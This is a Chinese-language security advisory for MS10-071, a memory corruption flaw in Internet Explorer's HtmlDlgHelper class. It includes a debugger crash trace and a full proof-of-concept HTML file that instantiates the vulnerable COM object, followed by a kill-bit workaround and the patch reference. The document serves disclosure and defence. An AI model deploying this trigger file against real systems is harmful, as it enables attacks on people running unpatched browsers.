Microsoft IE HtmlDlgHelper类内存破坏漏洞(MS10-071)

发表评论 (0) 查看评论

受影响系统:

Microsoft Internet Explorer 8.0
Microsoft Internet Explorer 7.0

描述:
Internet Explorer是Windows操作系统中默认捆绑的WEB浏览器。

Windows在实例化Office文档(如.XLS、.DOC)中HtmlDlgHelper类对象(CLASSID: 3050f4e1-98b5-11cf-bb82-00aa00bdce0b)的方式存在内存破坏漏洞。有漏洞的模块是Internet Explorer中的mshtmled.dll,当调用CHtmlDlgHelper类的析构程序之后访问未初始化内存时就会在mshtmled.dll中触发这个漏洞。以下是出现了漏洞的代码段:

mshtmled!ReleaseInterface:
42b919c0 8bff            mov     edi,edi
42b919c2 55              push    ebp
42b919c3 8bec            mov     ebp,esp
42b919c5 8b4508          mov     eax,dword ptr [ebp+8] ss:0023:0013d104=00310065
42b919c8 85c0            test    eax,eax
42b919ca 7406            je      mshtmled!ReleaseInterface+0x12 (42b919d2) [br=0]
42b919cc 8b08            mov     ecx,dword ptr [eax]  ds:0023:00310065
42b919ce 50              push    eax
42b919cf ff5108          call    dword ptr [ecx+8]    ds:0023:7d02029c=2a2c277a

eax=00310065 ebx=00000000 ecx=7d020294 edx=df0b3d60 esi=001edbdc edi=00000000
eip=2a2c277a esp=0013d0f4 ebp=0013d0fc iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000206

Stack Trace:
<Unloaded_ion.dll>+0x2a2c2779
mshtmled!ReleaseInterface+0x12
mshtmled!CHtmlDlgHelper::~CHtmlDlgHelper+0x10
mshtmled!ATL::CComAggObject<CHtmlDlgHelper>::`scalar deleting destructor’+0xd
mshtmled!ATL::CComAggObject<CHtmlDlgHelper>::Release+0x27
VBE6!rtcStrConvVar+0xbd65
VBE6!rtcSetDatabaseLcid+0xa823
EXCEL!Ordinal41+0xd2ad0
EXCEL!Ordinal41+0x14082a
USER32!CallWindowProcW+0x1b
Instruction Address: 0x000000002a2c277a

<*来源:Damián Frizza
  
  链接:http://secunia.com/advisories/41271/
        http://www.coresecurity.com/content/MS-Office-HtmlDlgHelper-memory-corruption
        http://www.microsoft.com/technet/security/bulletin/MS10-071.mspx?pf=true
        http://www.us-cert.gov/cas/techalerts/TA10-285A.html
*>

测试方法:
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

 

<html xmlns:v="urn:schemas-microsoft-com:vml"
xmlns:o="urn:schemas-microsoft-com:office:office"
xmlns:x="urn:schemas-microsoft-com:office:excel">

<head>
<meta http-equiv=Content-Type content="text/html; charset=windows-1252">
<meta name=ProgId content=Excel.Sheet>
<meta name=Generator content="Microsoft Excel 10">
<!–[if !mso]>
<style>
v\:* {behavior:url(#default#VML);}
o\:* {behavior:url(#default#VML);}
x\:* {behavior:url(#default#VML);}
.shape {behavior:url(#default#VML);}
</style>
<![endif]–><!–[if gte mso 9]><xml>
<o:DocumentProperties>
  <o:LastAuthor>TEST</o:LastAuthor>
  <o:LastSaved>2010-08-03T05:19:51Z</o:LastSaved>
  <o:Version>10.6858</o:Version>
</o:DocumentProperties>
<o:OfficeDocumentSettings>
  <o:DownloadComponents/>
  </o:OfficeDocumentSettings>
</xml><![endif]–>

<!–[if gte mso 9]><xml>
<x:ExcelWorkbook>
  <x:ExcelWorksheets>
   <x:ExcelWorksheet>
    <x:Name>test</x:Name>
    <x:WorksheetOptions>
     <x:CodeName>Sheet1</x:CodeName>
     <x:Selected/>
     <x:DoNotDisplayGridlines/>
     <x:ProtectContents>False</x:ProtectContents>
     <x:ProtectObjects>False</x:ProtectObjects>
     <x:ProtectScenarios>False</x:ProtectScenarios>
    </x:WorksheetOptions>
   </x:ExcelWorksheet>
  </x:ExcelWorksheets>
  <x:WindowHeight>9345</x:WindowHeight>
  <x:WindowWidth>13260</x:WindowWidth>
  <x:WindowTopX>240</x:WindowTopX>
  <x:WindowTopY>60</x:WindowTopY>
  <x:ProtectStructure>False</x:ProtectStructure>
  <x:ProtectWindows>False</x:ProtectWindows>
</x:ExcelWorkbook>
</xml><![endif]–><!–[if gte mso 9]><xml>
<o:shapedefaults v:ext="edit" spidmax="1026"/>
</xml><![endif]–><!–[if gte mso 9]><xml>
<o:shapelayout v:ext="edit">
  <o:idmap v:ext="edit" data="1"/>
</o:shapelayout></xml><![endif]–>
</head>

<body link=blue vlink=purple>

<table x:str border=0 cellpadding=0 cellspacing=0 width=64 style=’border-collapse:
collapse;table-layout:fixed;width:48pt’>
<col width=64 style=’width:48pt’>
<tr height=17 style=’height:12.75pt’>
  <td height=17 width=64 style=’height:12.75pt;width:48pt’ align=left
  valign=top><!–[if gte vml 1]><v:shapetype id="_x0000_t201" coordsize="21600,21600"
   o:spt="201" path="m,l,21600r21600,l21600,xe">
   <v:stroke joinstyle="miter"/>
   <v:path shadowok="f" o:extrusionok="f" strokeok="f" fillok="f"
    o:connecttype="rect"/>
   <o:lock v:ext="edit" shapetype="t"/>
  </v:shapetype><v:shape id="_x0000_s1025" type="#_x0000_t201" style=’position:absolute;
   margin-left:0;margin-top:0;width:48pt;height:12.75pt;z-index:1′
   strokecolor="windowText [64]" o:insetmode="auto">
   <![if gte mso 9]><o:title=""/>
   <![endif]><x:ClientData ObjectType="Pict">
    <x:SizeWithCells/>
    <x:CF>Pict</x:CF>
    <x:AutoPict/>
   </x:ClientData>
  </v:shape><![endif]–><![if !vml]><span style=’mso-ignore:vglayout;
  position:absolute;z-index:1;margin-left:0px;margin-top:0px;width:64px;
  height:17px’><![endif]>

<object classid="CLSID:3050F4E1-98B5-11CF-BB82-00AA00BDCE0B" id=obj></object>

<![if !vml]></span><![endif]><span
  style=’mso-ignore:vglayout2′>
  <table cellpadding=0 cellspacing=0>
   <tr>
    <td height=17 width=64 style=’height:12.75pt;width:48pt’></td>
   </tr>
  </table>
  </span></td>
</tr>
<![if supportMisalignedColumns]>
<tr height=0 style=’display:none’>
  <td width=64 style=’width:48pt’></td>
</tr>
<![endif]>
</table>
</body>
</html>

建议:

临时解决方法:

* 禁止在Internet Explorer中运行COM对象。
    
如果要对CLSID值{3050f4e1-98b5-11cf-bb82-00aa00bdce0b}设置kill bit,在文本编辑器(如写字板)中粘贴以下文本然后使用.reg文件名扩展保存文件。

Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{3050f4e1-98b5-11cf-bb82-00aa00bdce0b}]
"Compatibility Flags"=dword:00000400

通过双击将这个.reg文件应用到单个系统。

厂商补丁:

Microsoft
———
Microsoft已经为此发布了一个安全公告(MS10-071)以及相应补丁:
MS10-071:Cumulative Security Update for Internet Explorer (2360131)
链接:http://www.microsoft.com/technet/security/bulletin/MS10-071.mspx?pf=true

发表评论?

0 条评论。

发表评论